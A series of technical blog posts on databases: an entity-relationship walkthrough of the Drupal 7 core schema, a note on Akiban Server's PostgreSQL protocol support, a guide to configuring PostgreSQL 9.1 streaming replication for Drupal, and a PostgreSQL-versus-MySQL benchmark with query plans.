I’ll start off by showing my complete ER diagram below. You will see I grouped tables I found to be related in colored boxes. The image below is just meant to give a general overview of the schema. I will be diving into different parts of the schema in this post. I created this diagram using MySQL Workbench and the model can be downloaded from here if someone wishes to open this up in Workbench. This gist also shows the ALTER TABLE SQL statements that would need to be issued to actually create these foreign keys in MySQL. I would not recommend doing this right now with Drupal as many things would break.

Without delving into the relationships and details of this diagram, let’s first cover some basic details. A stock install of Drupal 7 results in 73 tables being created. 10 of those tables are used for caching purposes:

Caching Table	Description
cache	caches items not separated out into their own cache tables
cache_block	the block module can cache already built blocks here
cache_bootstrap	data required during the bootstrap process can be cached in this table
cache_field	stores cached field values
cache_filter	caches already filtered pieces of text
cache_form	caches recently built forms and their storage data
cache_image	caches information about image manipulations that are in progress
cache_menu	caches router information as well as generated link trees
cache_page	caches compressed pages served to anonymous users
cache_path	caches path aliases

11 tables are created which do not relate to any other tables:

Table Name	Description
actions	stores action information
batch	stores details about batches (processes that run in multiple HTTP requests)
blocked_ips	stores a list of blocked IP addresses
flood	controls the threshold of events, such as the number of contact attempts
queue	stores items in queues
rdf_mapping	stores custom RDF mappings for user-defined content types
semaphore	stores semaphores, locks, and flags
sequences	stores IDs
system	contains a list of all modules, themes, and theme engines that are or have been installed
url_alias	contains a list of URL aliases for Drupal paths
variable	stores variable/value pairs created by Drupal core or any other module or theme

The 21 tables listed above are self-explanatory and I’m not going to discuss them any further in this post. They also are independent in that these tables have no relationships with other tables.

Field Related Tables

There are 8 tables installed with core related to fields and field storage:

Table Name	Description
field_data_body	stores details about the body field of an entity
field_revision_body	stores information about revisions to body fields
field_data_comment_body	stores information about comments associated with an entity
field_revision_comment_body	stores information about revisions to comments
field_data_field_image	stores information about images associated with an entity
field_revision_field_image	stores information about revisions to images
field_data_field_tags	stores information about tags associated with an entity
field_revision_field_tags	stores information about revisions to taxonomy terms/tags associated with an entity

While I was initially tempted to have these tables related to node, that would not really be correct since these tables are related to an entity. In D7, entities can be other objects besides nodes, such as users or comments. The entity_type column in these tables reflects that reality. These tables can be stored in other storage systems such as MongoDB due to the field storage API introduced in Drupal 7.

There are 2 other tables related to fields: field_config and field_config_instance. These tables store field configuration information. I believe a row in field_config_instance cannot (well at least should not) exist without the corresponding field_id in the field_config table. Hence, the one-to-many relationship from field_config to field_config_instance is an identifying relationship.

Small Groups of Tables

There are a number of groups you will notice in the full ER diagram that are made up of 2 to 3 tables. Zooming in on 4 of those groups, we can see those tables more clearly:

One thing you will notice is that some relationships are shown with a solid line whereas others use a dotted line. MySQL Workbench represents identifying relationships with a solid line and non-identifying relationships with a dotted line. If you are unfamiliar with those terms, the standard definitions are:

identifying relationship - the foreign key attribute is part of the child’s primary key attribute.
non-identifying relationship - the primary key attributes of the parent must not become primary key attributes of the child.

This stack overflow answer from Bill Karwin contains a good discussion on these topics.
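To make the two definitions concrete, here is a minimal sketch using Python's built-in sqlite3 module. The parent, child_identifying and child_non_identifying tables are hypothetical and are not part of the Drupal schema; they only show where the foreign key column sits relative to the child's primary key.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE parent (id INTEGER PRIMARY KEY);

    -- Identifying: the foreign key is part of the child's primary key.
    CREATE TABLE child_identifying (
        parent_id INTEGER NOT NULL REFERENCES parent(id),
        seq       INTEGER NOT NULL,
        PRIMARY KEY (parent_id, seq)
    );

    -- Non-identifying: the child has its own key and the foreign key
    -- is an ordinary column.
    CREATE TABLE child_non_identifying (
        id        INTEGER PRIMARY KEY,
        parent_id INTEGER REFERENCES parent(id)
    );
""")


def primary_key_columns(table):
    """Return the primary key column names of a table, in key order."""
    rows = conn.execute(f"PRAGMA table_info({table})").fetchall()
    # Each row is (cid, name, type, notnull, dflt_value, pk); pk > 0 marks key columns.
    key_cols = [(row[5], row[1]) for row in rows if row[5] > 0]
    return [name for _, name in sorted(key_cols)]


def foreign_key_columns(table):
    """Return the child-side column names used by the table's foreign keys."""
    rows = conn.execute(f"PRAGMA foreign_key_list({table})").fetchall()
    # Each row is (id, seq, table, from, to, on_update, on_delete, match).
    return [row[3] for row in rows]


def is_identifying(table):
    """True when every foreign key column is also a primary key column."""
    return set(foreign_key_columns(table)) <= set(primary_key_columns(table))


for name in ("child_identifying", "child_non_identifying"):
    print(name, is_identifying(name))
```

The check is deliberately simple: it treats a table as the child side of an identifying relationship when all of its foreign key columns are also primary key columns.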

Now let’s discuss those groups in more detail.

Registry Group

I grouped the registry and registry_file tables together. These tables are used for implementing the code registry in Drupal. A one-to-many relationship exists from registry_file to registry and this relationship is an identifying relationship. A filename should not appear in the registry table that is not present in the registry_file table.

Image Group

I grouped the image_styles and image_effects tables together. These tables store configuration options for image styles and effects. A one-to-many relationship exists from image_styles to image_effects and this relationship is a non-identifying relationship.

date_format Group

There are three tables about date formats in Drupal. date_format_type is a lookup table that stores configured date format types. After a stock install of Drupal 7, three date format types exist:

long
medium
short

A one-to-many relationship exists from this lookup table to both date_formats and date_format_locale.

In practice, this would be problematic. For example, a new date format can be created by an administrator. In D7, this results in the system_date_format_save function being called. This function will insert a row in the date_formats table that will not have a corresponding type (type will be listed as custom).
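The problem can be reproduced in miniature. The sketch below uses Python's sqlite3 module with heavily simplified, hypothetical versions of the two tables (the real Drupal tables have more columns) and an enforced foreign key on the type column. A row with a known type is accepted, while a row with type custom is rejected.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# SQLite only enforces foreign keys when this pragma is switched on.
conn.execute("PRAGMA foreign_keys = ON")
conn.executescript("""
    -- Simplified stand-ins for the Drupal tables, for illustration only.
    CREATE TABLE date_format_type (type TEXT PRIMARY KEY);
    CREATE TABLE date_formats (
        dfid   INTEGER PRIMARY KEY,
        format TEXT NOT NULL,
        type   TEXT NOT NULL REFERENCES date_format_type(type)
    );
    INSERT INTO date_format_type (type) VALUES ('long'), ('medium'), ('short');
""")


def try_insert(fmt, fmt_type):
    """Insert a date format; return False if the foreign key rejects it."""
    try:
        with conn:  # commits on success, rolls back on error
            conn.execute(
                "INSERT INTO date_formats (format, type) VALUES (?, ?)",
                (fmt, fmt_type),
            )
        return True
    except sqlite3.IntegrityError:
        return False


print(try_insert("D, m/d/Y", "medium"))  # type exists in the lookup table
print(try_insert("Y-m-d", "custom"))     # no 'custom' row in the lookup table
```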

You will also notice the locked column is redundant in the date_formats table. I submitted a patch to change this.

File Group

I grouped the file_managed and file_usage tables into 1 group. These tables store information about uploaded files and information for tracking where a file is used.

I believe a 1-to-1 relationship exists from file_managed to file_usage and that this is an identifying relationship.

User Related Tables

There are quite a few tables that store user related information. Below is a figure where I zoom in on those tables.

As you can see, the tables directly associated with users are watchdog, sessions, and authmap. These tables are in a one-to-many relationship from users. The functionality these tables provide is:

Table Name	Description
authmap	stores distributed authentication mapping
sessions	stores information about a user’s session
watchdog	contains logs of all system events

There are then two tables that are in a many-to-many relationship with users that link this table with other groups. One of these is the users_roles table. This table links users with role. The role table is then in a one-to-many relationship with the role_permission table. The other many-to-many table is shortcut_set_users. This table links users with shortcut_set.

The tables for the menu system are not really related to users but I placed the group close by since the menu_links table maintains a one-to-many relationship with the shortcut_set table. While the tables for the menu system do not appear to be related, I do believe a relationship exists there. In particular, I think that the menu_links table has relationships to both the menu_router and menu_custom tables. The router_path column in menu_links could reference the path column in menu_router and the menu_name column in menu_links could reference the menu_name in the menu_custom table. Right now however, after a stock install of D7, a row with a menu name that is not present in menu_custom will be created in menu_links.

The menu system tables and a description of what they do is below.

Table Name	Description
menu_custom	holds definitions for top-level custom menus
menu_links	contains the individual links within a menu
menu_router	maps paths to various callbacks

Node Related Tables

Node is one of the most central concepts in Drupal so, as you can imagine, many tables are related to that concept. First off, a high level overview of the tables related to the node table is shown below.

Tables that are directly related to node are node_revision, node_access, and node_type. The node_type table is in a many-to-many relationship with node and block_node_type. node_revision is in a many-to-one relationship with node as is node_access. The node_access table has only 1 row upon initial installation and references a non-existent node. An issue has been created to address this.

The tables directly related to node and a description of what they do is below.

Table Name	Description
node_access	identifies which realm/grant pairs a user must possess in order to view, update, or delete specific nodes
node_revision	stores information about each saved version of a node
node_type	stores information about all defined node types

Taxonomy Tables

Four tables in the stock schema are related to taxonomy. These tables are shown in the figure below.

First of all, the taxonomy_index table is in a many-to-many relationship with the node and taxonomy_term_data tables. The taxonomy_vocabulary table has a one-to-many relationship with the taxonomy_term_data table. The taxonomy_term_data table in turn has 2 1-to-many relationships with the taxonomy_term_hierarchy table.

A description of the taxonomy tables is given below.

Table Name	Description
taxonomy_index	maintains de-normalized information about node/term relationships
taxonomy_term_data	stores term information
taxonomy_term_hierarchy	stores the hierarchical relationship between terms
taxonomy_vocabulary	stores vocabulary information

Block Tables

The main table in this group is block. It has three directly related tables in one-to-many relationships: block_node_type, block_role, and block_custom.

A description of the block tables is given below.

Table Name	Description
block	stores block settings
block_custom	stores the contents of custom-made blocks
block_node_type	stores information that sets up display criteria for blocks based on content type
block_role	stores access permissions for blocks based on user roles

Search Tables

The relationships for the search tables I am a little unsure of. I believe they are as shown in the figure below.

The relationship I’m most unsure of here is the one between search_total and search_index. I don’t think the one-to-many relationship I have in place from search_total to search_index is correct.

A description of the search tables is given below.

Table Name	Description
search_dataset	stores items that will be searched
search_index	stores the search index and associates words, items, and scores
search_node_links	stores items that link to other nodes
search_total	stores search totals for words

Tables That Relate Nodes to Users

There are three tables in many-to-many relationships between node and users:

Table Name	Description
comment	stores comments and associated data
history	stores a record of which users have read which nodes
node_comment_statistics	maintains statistics of nodes and comments posts to show new and updated flags

The comment table could be in its own group. I decided against doing that in this ER diagram since I felt like it would have been a table by itself. Logically, I think of it as either being in the users or node group.

node_comment_statistics does also maintain a relationship with comment. This is a non-identifying relationship since a node can exist without any comments.

Conclusion

During this work, I noticed that the column definitions for many foreign key relationships are incorrect, which would result in MySQL not allowing these constraints to actually be created. I created an issue and patch for this but it turns out Liam Morland is working on using foreign keys in core and also came across this around the same time as me.

Other issues I encountered have also been logged by Liam:

the node_access table references a non-existent node (relevant issue)
a set name exists in shortcut_set that does not exist in menu_links (relevant issue)

I would vote for foreign keys being used in Drupal core for a number of reasons, not least of which foreign keys aid a newcomer when trying to understand the schema installed by Drupal.

As I mentioned at the beginning of this post, any comments or corrections are very much welcome. I hope this information can prove useful to someone else besides me!

PostgreSQL Protocol in Akiban Server

2012-07-23T00:00:00-07:00

Last week I was at OSCON with Akiban where I did a demo during Ori’s talk. We announced our early developer release at OSCON and it was a lot of fun to be able to show people our product at our booth. It was also satisfying to see users download and try out the product we’ve been working on. I’m hoping our source code will also be made publicly available in the near future.

One of the common questions we got during the conference was why we implemented the PostgreSQL protocol. Some people were also confused thinking that we were a fork of PostgreSQL due to this. Akiban Server is a completely independent database server we’ve built from the ground up and when it came time to decide on a communication protocol, we decided that the PostgreSQL protocol was the best choice.

The main reasons we chose the PostgreSQL protocol are:

the protocol is pretty simple and well documented
many clients exist for PostgreSQL and can be re-used with Akiban (this means we do not have to spend a lot of time on client drivers)
the PostgreSQL command line tool and client library ship with OSX by default now (making playing with our server much easier)
it supports asynchronous operations

We (really when I say we, I mean Mike) also implemented support for a number of PostgreSQL system tables in order to support many of the \d commands in psql by creating views internally.

If you are interested in trying it out, I encourage you to download our server and start playing with it. Try using your favorite PostgreSQL tools with it and see if they break. We are very interested in any and all feedback!

Configuring Drupal 7.x With PostgreSQL Replication

2012-07-08T00:00:00-07:00

One of the new features in Drupal 7 is that it supports sending queries to a read-only slave database. Since version 9.0, PostgreSQL supports replication natively. In this post, I wanted to cover how to configure replication in PostgreSQL and have Drupal make use of a slave. I will use the master/slave terminology that is common in the MySQL world when referring to the master (primary) and slave (standby) servers in this post.

First, I installed PostgreSQL 9.1 on my master server along with Drupal 7.12. The steps taken to install and configure Drupal with PostgreSQL 9.1 on my master server are outlined in this gist. Then I installed PostgreSQL 9.1 on another server that will serve as a slave. My initial setup on the slave was quite simple and only involved a basic install and nothing else. The following commands were all I executed on the slave server to get a base PostgreSQL install:

sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev postgresql-contrib-9.1

Once the basic Drupal install was up and running on the master and the slave server had a basic PostgreSQL install, I started configuring replication. Replication in general is documented in depth in the online PostgreSQL documentation. In this post, I will be configuring streaming replication which allows a slave server to service read queries.

The steps that need to be performed to configure streaming replication are (I will cover how to perform each step):

create a replication user for slaves to connect with
enable continuous archiving on the master
configure the master to allow remote connections with the replication user
take a base backup to be used for setting up a slave
set up a file-based log-shipping slave

The first step is to create a user for replication on the master:

sudo su postgres
psql
create role repl replication login password 'repl';

Next, the master needs to have continuous archiving enabled. This is achieved by editing the /etc/postgresql/9.1/main/postgresql.conf file on the master and ensuring the following parameters are set:

wal_level = hot_standby
max_wal_senders = 3 # limits number of concurrent connections from standby
listen_addresses = '0.0.0.0'
archive_mode = on
archive_command = 'test ! -f /mnt/postgres/archivedir/%f && cp %p /mnt/postgres/archivedir/%f'
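Before restarting the service, it can help to check that these parameters really are present in the file. The following is a rough Python sketch, not an official tool: parse_conf and master_problems are hypothetical helper names, and the parser is naive (it treats every # as the start of a comment, so it would mishandle a quoted value containing #).

```python
# Settings the master needs with an exact value, per the list above.
REQUIRED_MASTER_SETTINGS = {"wal_level": "hot_standby", "archive_mode": "on"}


def parse_conf(text):
    """Parse 'name = value' lines, dropping comments and surrounding quotes."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # naive comment stripping
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().strip("'")
    return settings


def master_problems(settings):
    """Return a list of human-readable problems; empty means all checks passed."""
    problems = []
    for key, expected in REQUIRED_MASTER_SETTINGS.items():
        if settings.get(key) != expected:
            problems.append(f"{key} should be {expected}")
    if int(settings.get("max_wal_senders", "0")) < 1:
        problems.append("max_wal_senders should be at least 1")
    if not settings.get("archive_command"):
        problems.append("archive_command is not set")
    return problems


sample = """
wal_level = hot_standby
max_wal_senders = 3 # limits number of concurrent connections from standby
listen_addresses = '0.0.0.0'
archive_mode = on
archive_command = 'test ! -f /mnt/postgres/archivedir/%f && cp %p /mnt/postgres/archivedir/%f'
"""
print(master_problems(parse_conf(sample)))
```

In practice the text would be read from /etc/postgresql/9.1/main/postgresql.conf instead of the inline sample.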

Now to allow remote connections for the replication user, the /etc/postgresql/9.1/main/pg_hba.conf file on the master server needs to have an entry like (this assumes the slave server I have configured has the IP address 10.39.111.10):

host  replication   repl 10.39.111.10/32      md5

Once the above modifications have been made, we need to restart the PostgreSQL service:

sudo service postgresql restart

The master is now configured. Next we go to the slave server to take a base backup using pg_basebackup along with configuring the slave to use this base backup for its data directory:

sudo service postgresql stop
sudo mv /var/lib/postgresql/9.1/main/ /var/lib/postgresql/9.1/orig_main
sudo su postgres
pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h master_server -p 5432 -U repl -W
sudo ln -s /etc/ssl/certs/ssl-cert-snakeoil.pem /var/lib/postgresql/9.1/main/server.crt
sudo ln -s /etc/ssl/private/ssl-cert-snakeoil.key /var/lib/postgresql/9.1/main/server.key

The pg_basebackup command should result in output similar to the following:

postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$ pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h 10.76.241.129 -p 5432 -U repl -W
Password: 
WARNING:  skipping special file "./server.key"
WARNING:  skipping special file "./server.crt"
WARNING:  skipping special file "./server.key"
WARNING:  skipping special file "./server.crt"
1403786/1403786 kB (100%), 1/1 tablespace
NOTICE:  pg_stop_backup complete, all required WAL segments have been archived
postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$

Next, we configure the slave to be a hot standby and to allow remote client connections (since Drupal will be connecting to the slave). This is done by editing the /etc/postgresql/9.1/main/postgresql.conf file on the slave to have the following entries:

hot_standby = on
listen_addresses = '0.0.0.0'

To allow the drupal user to connect from the master server (where apache is running), modify the /etc/postgresql/9.1/main/pg_hba.conf file on the slave (assuming 10.76.241.129 is IP address of master):

host  drupal drupal 10.76.241.129/32      md5

Next, create a recovery.conf file in the PostgreSQL data directory on the slave server:

sudo touch /var/lib/postgresql/9.1/main/recovery.conf
sudo chown postgres:postgres /var/lib/postgresql/9.1/main/recovery.conf

The following should be placed in the recovery.conf file (assuming 10.76.241.129 is IP address of master):

standby_mode = 'on'
primary_conninfo = 'host=10.76.241.129 port=5432 user=repl password=repl'

The PostgreSQL service on the slave server is now ready to be started again:

sudo service postgresql start

If everything worked correctly, log entries indicating replication is running should be present. For example, on my slave server my log file had entries like:

ubuntu@ip-10-39-111-9:/var/log/postgresql$ sudo tail -n 5 /var/log/postgresql/postgresql-9.1-main.log 
2012-07-07 22:06:50 UTC LOG:  streaming replication successfully connected to primary
2012-07-07 22:06:50 UTC LOG:  incomplete startup packet
2012-07-07 22:06:50 UTC LOG:  redo starts at 1/15000020
2012-07-07 22:06:50 UTC LOG:  consistent recovery state reached at 1/16000000
2012-07-07 22:06:50 UTC LOG:  database system is ready to accept read only connections
ubuntu@ip-10-39-111-9:/var/log/postgresql$

Now, Drupal running on the master server is ready to be configured to use a PostgreSQL slave for read-only queries! The settings.php file for the Drupal site needs to be updated to know about this slave database. My settings.php file looked like (10.39.111.10 is IP address of slave server):

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '5432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
    'slave' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => '10.39.111.10',
      'port' => '5432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

I would suggest enabling query logging on the slave server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the /etc/postgresql/9.1/main/postgresql.conf file to have these entries:

logging_collector = on
log_directory = 'pg_log'
log_statement = 'all'

Query log files will then be generated in the /var/lib/postgresql/9.1/main/pg_log directory.

By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to the slave server. The search module can be accessed from your Drupal site by going to http://your.ip.address/drupal/?q=search

Try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the slave server when issuing content searches.
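If the log gets noisy, a few lines of Python can pull out just the SQL. This is a sketch under assumptions: it expects log entries of the form "LOG:  statement: ..." or "LOG:  execute <name>: ...", and the sample lines below are made up for illustration rather than copied from a real log.

```python
import re

# Matches simple-protocol statements and executions of prepared statements.
STATEMENT_RE = re.compile(r"LOG:\s+(?:statement|execute [^:]+):\s+(?P<sql>.*)$")


def logged_statements(lines):
    """Return the SQL text of every logged statement, in log order."""
    statements = []
    for line in lines:
        match = STATEMENT_RE.search(line.rstrip("\n"))
        if match:
            statements.append(match.group("sql"))
    return statements


# Hypothetical sample input, not taken from an actual server.
sample_lines = [
    "2012-07-07 22:10:01 UTC LOG:  statement: SELECT 1",
    "2012-07-07 22:10:02 UTC LOG:  execute pdo_stmt_00000001: SELECT COUNT(*) FROM search_index",
    "2012-07-07 22:10:03 UTC LOG:  incomplete startup packet",
]
for sql in logged_statements(sample_lines):
    print(sql)
```

To use it against a real file, pass an open file object for one of the files in the pg_log directory instead of sample_lines.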

That’s about it for this post. Once replication is configured in PostgreSQL, having Drupal send queries to the slave is pretty straightforward.

Comparing PostgreSQL 9.1 vs. MySQL 5.6 using Drupal 7.x

2012-06-29T00:00:00-07:00

It’s tough to come across much information about running Drupal on PostgreSQL besides the basics of installing it. In particular, I’m interested in comparisons of running Drupal on PostgreSQL versus MySQL. Previous posts such as this article from 2bits compare performance of MySQL versus PostgreSQL on Drupal 5.x and seem a bit outdated. This post from the high performance drupal group is also pretty dated and has some information with similar comparisons.

In this post, I wanted to run similar tests to what was done in the article from 2bits but on a more recent version of Drupal - 7.x. I also wanted to test out a few more complex queries that can get generated by the Views module and see how they perform in MySQL versus PostgreSQL.

For this post, I used the latest GA version of PostgreSQL and for kicks, I went with an alpha release of MySQL - 5.6. I would expect to see similar results for 5.5 in tests like this. I didn’t use default configurations after installation since I didn’t see much benefit in testing that. The configurations I used for both systems are documented below.

Environment Setup

All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by Canonical. The particular AMI used as the base image for the results gathered in this post was ami-0baf7662.

Images used were all launched in the US-EAST-1A availability zone and were large instance types. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the my.cnf file I used for MySQL are outlined in this gist.

The PostgreSQL 9.1 setup I performed on a separate instance along with the postgresql.conf settings I used are outlined in this gist.

APC was installed and its default configuration was used on both servers.

Data Generation

I used drush and the devel modules to generate data. I generated the following data:

users	50000
tags	1000
vocabularies	5000
menus	5000
nodes	100000
max comments per node	10

I generated this data in the MySQL installation first. The data was then migrated to the PostgreSQL instance using the dbtng_migrator module. This ensures the same data is used for all tests against MySQL and PostgreSQL. I covered how to perform this migration in a previous post.

pgbouncer

One additional setup item I performed for PostgreSQL was to install pgbouncer and configure Drupal to connect through pgbouncer instead of directly to PostgreSQL.

Installation and configuration on Ubuntu 10.04 is straightforward. The steps to install pgbouncer and the configuration I used are outlined in this gist.

The main reason for this change is that the ApacheBench based test unfairly favors MySQL due to its process model. With MySQL, each connection results in a new thread being spawned, whereas with PostgreSQL each new connection results in a new process being forked. The overhead of forking a new process is much larger than that of spawning a new thread. I did collect numbers for PostgreSQL without using pgbouncer and I do report them in the ApacheBench test section below.

pgbouncer maintains a connection pool that Drupal connects to, so in my settings.php file for my Drupal PostgreSQL instance, I modified my database settings to be:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '6432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

I performed this configuration step after I generated data in MySQL and migrated it to PostgreSQL.
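The idea behind a connection pool can be sketched in a few lines of Python. This is only an illustration of the concept, not how pgbouncer is implemented: pgbouncer is a separate proxy process, whereas the hypothetical ConnectionPool class below lives in-process, opens all of its connections eagerly, and uses a fake connect function in place of a real database driver.

```python
import queue


class ConnectionPool:
    """Hands out a fixed set of already-open connections for reuse."""

    def __init__(self, connect, size):
        self._idle = queue.Queue(maxsize=size)
        for _ in range(size):
            self._idle.put(connect())  # pay the connection cost once, up front

    def acquire(self, timeout=None):
        # Blocks until a connection is free instead of opening a new one.
        return self._idle.get(timeout=timeout)

    def release(self, conn):
        self._idle.put(conn)


opened = 0


def fake_connect():
    """Stand-in for an expensive connect call (a forked backend in PostgreSQL)."""
    global opened
    opened += 1
    return object()


pool = ConnectionPool(fake_connect, size=5)
for _ in range(100):  # 100 simulated page requests
    conn = pool.acquire()
    # ... run queries on conn ...
    pool.release(conn)

print(opened)  # number of real connections opened for the 100 requests
```

However many requests arrive, the expensive connect step runs only as many times as the pool has slots.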

Anonymous Users Testing with ApacheBench

First, loading the front page for each Drupal site with the devel module enabled and reporting on query execution times, the following was reported:

Database	Query Exec Times
MySQL	Executed 65 queries in 31.69 ms
PostgreSQL (with pgbouncer)	Executed 66 queries in 49.84 ms
PostgreSQL	Executed 66 queries in 95 ms

Straight out of the gate, we can see there is not much difference here. 31 versus 50 ms is not going to be felt by many end users. If pgbouncer is not used, though, query execution time is about 3 times slower than with MySQL.
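For anyone who wants to check the arithmetic, this small Python snippet computes the absolute and relative differences from the numbers in the table above, using MySQL as the baseline. The slowdown helper is just a name chosen for this example.

```python
# Query execution times from the table above, in milliseconds.
query_times_ms = {
    "MySQL": 31.69,
    "PostgreSQL (with pgbouncer)": 49.84,
    "PostgreSQL": 95.0,
}


def slowdown(name, baseline="MySQL"):
    """Return how many times slower `name` is than the baseline."""
    return query_times_ms[name] / query_times_ms[baseline]


for name, ms in query_times_ms.items():
    extra = ms - query_times_ms["MySQL"]
    print(f"{name}: {ms:.2f} ms, {extra:+.2f} ms, {slowdown(name):.2f}x MySQL")
```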

Next, I went to do some simple benchmarks using ApacheBench. The command used to run ab was (the number of concurrent connections, X, was the only parameter varied):

ab -c X -n 100 http://drupal.url.com/

The ab command was always run from a separate EC2 instance in the same availability zone and never on the instance on which Drupal was running.
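Runs like this are easy to script. The sketch below is one way it could be done in Python, assuming ab is on the PATH; the helper names are my own, and the sample output line passed to the parser is a made-up value in the format ab uses for its "Requests per second" line.

```python
import re
import subprocess

RPS_RE = re.compile(r"^Requests per second:\s+([0-9.]+)", re.MULTILINE)


def ab_command(url, concurrency, requests=100):
    """Build the ab invocation used above for a given concurrency level."""
    return ["ab", "-c", str(concurrency), "-n", str(requests), url]


def requests_per_second(ab_output):
    """Extract the mean requests-per-second figure from ab's report."""
    match = RPS_RE.search(ab_output)
    if match is None:
        raise ValueError("no 'Requests per second' line found")
    return float(match.group(1))


def run_ab(url, concurrency):
    """Run ab once and return its requests-per-second figure (not called here)."""
    result = subprocess.run(
        ab_command(url, concurrency), capture_output=True, text=True, check=True
    )
    return requests_per_second(result.stdout)


for c in (1, 5, 10):
    print(" ".join(ab_command("http://drupal.url.com/", c)))

# Hypothetical report line, only to show the parser at work.
print(requests_per_second("Requests per second:    12.34 [#/sec] (mean)\n"))
```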

Results obtained with default Drupal configuration (page cache disabled) but all other caching enabled are shown in the figure below. The raw numbers are presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	11.71	16.53	16.28
PostgreSQL (using pgbouncer)	8.44	11.03	11.10
PostgreSQL	4.81	7.32	7.22

The next test was run after all caches were cleared using drush. The command issued was:

drush cc

Option 1 was then chosen to clear all caches. This was done before each ab command was run. Results are shown in the figure with raw numbers presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	10.50	14.08	6.28
PostgreSQL (using pgbouncer)	7.92	9.23	7.32
PostgreSQL	5	7.04	6.79

Finally, the same test was run with Drupal’s page cache enabled. Results are shown in the figure below with raw numbers presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	144	282	267
PostgreSQL (using pgbouncer)	120	205	202
PostgreSQL	35	45	46

Views Queries

The views module is known to sometimes generate queries that can cause performance problems for MySQL.

Image Gallery View

The first SQL query I want to look at is generated by one of the sample templates that come with the Views module. If you click ‘Add view from template’ in the Views module, by default, you will only have 1 template to choose from - the Image Gallery template. After creating a view from this template and not modifying anything about that view, I see 2 problematic queries being generated.

The first query is a query that counts the number of the rows in the result set for this view since this is a paginated view. The second query actually retrieves the results with a LIMIT clause and the appropriate OFFSET depending on what page of the results the user is currently on. For this post, we’ll just look at the second query that retrieves results. That query is:

SELECT taxonomy_index.tid      AS taxonomy_index_tid, 
       taxonomy_term_data.name AS taxonomy_term_data_name, 
       Count(node.nid)         AS num_records 
FROM   node node 
       LEFT JOIN users users_node 
              ON node.uid = users_node.uid 
       LEFT JOIN field_data_field_image field_data_field_image 
              ON node.nid = field_data_field_image.entity_id 
                 AND ( field_data_field_image.entity_type = 'node' 
                       AND field_data_field_image.deleted = '0' ) 
       LEFT JOIN taxonomy_index taxonomy_index 
              ON node.nid = taxonomy_index.nid 
       LEFT JOIN taxonomy_term_data taxonomy_term_data 
              ON taxonomy_index.tid = taxonomy_term_data.tid 
WHERE  (( ( field_data_field_image.field_image_fid IS NOT NULL ) 
          AND ( node.status = '1' ) )) 
GROUP  BY taxonomy_term_data_name, 
          taxonomy_index_tid 
ORDER  BY num_records ASC 
LIMIT  24 offset 0
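The LIMIT and OFFSET values in the query above follow directly from the page being viewed, and the count query is what tells the pager how many pages exist. A minimal Python sketch of that arithmetic is below; it assumes a zero-based page index and 24 items per page (matching the LIMIT above), and the function names are hypothetical.

```python
def page_window(page, items_per_page=24):
    """Return (limit, offset) for a zero-based page index."""
    if page < 0 or items_per_page < 1:
        raise ValueError("page must be >= 0 and items_per_page >= 1")
    return items_per_page, page * items_per_page


def page_count(total_rows, items_per_page=24):
    """Number of pages needed for total_rows, as found by the count query."""
    return -(-total_rows // items_per_page)  # ceiling division


print(page_window(0))   # first page, as in the query above
print(page_window(2))   # third page
print(page_count(100))  # pages needed for 100 rows
```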

The response time of the query in MySQL versus PostgreSQL is shown in the figure below.

As seen in the image above, PostgreSQL can execute the query in question in 300ms or less whereas MySQL consistently takes 2800 ms to execute the query.

The MySQL execution plan looks like:

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: field_data_field_image
         type: ref
possible_keys: PRIMARY,entity_type,deleted,entity_id,field_image_fid
          key: PRIMARY
      key_len: 386
          ref: const
         rows: 19165
        Extra: Using where; Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_status_type
          key: PRIMARY
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: users_node
         type: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.node.uid
         rows: 1
        Extra: Using where; Using index
*************************** 4. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_index
         type: ref
possible_keys: nid
          key: nid
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: NULL
*************************** 5. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_term_data
         type: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.taxonomy_index.tid
         rows: 1
        Extra: NULL

MySQL starts from the field_data_field_image table and, since there are no selective predicates in the query, chooses to scan the table using its PRIMARY key. It then filters the scanned rows using the field_image_fid IS NOT NULL predicate. Since MySQL only has one join algorithm, nested loops, it is used to perform the remainder of the joins. A temporary table is created in memory to store the results of these joins. This is then sorted and the result set is limited to the 24 rows requested.
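
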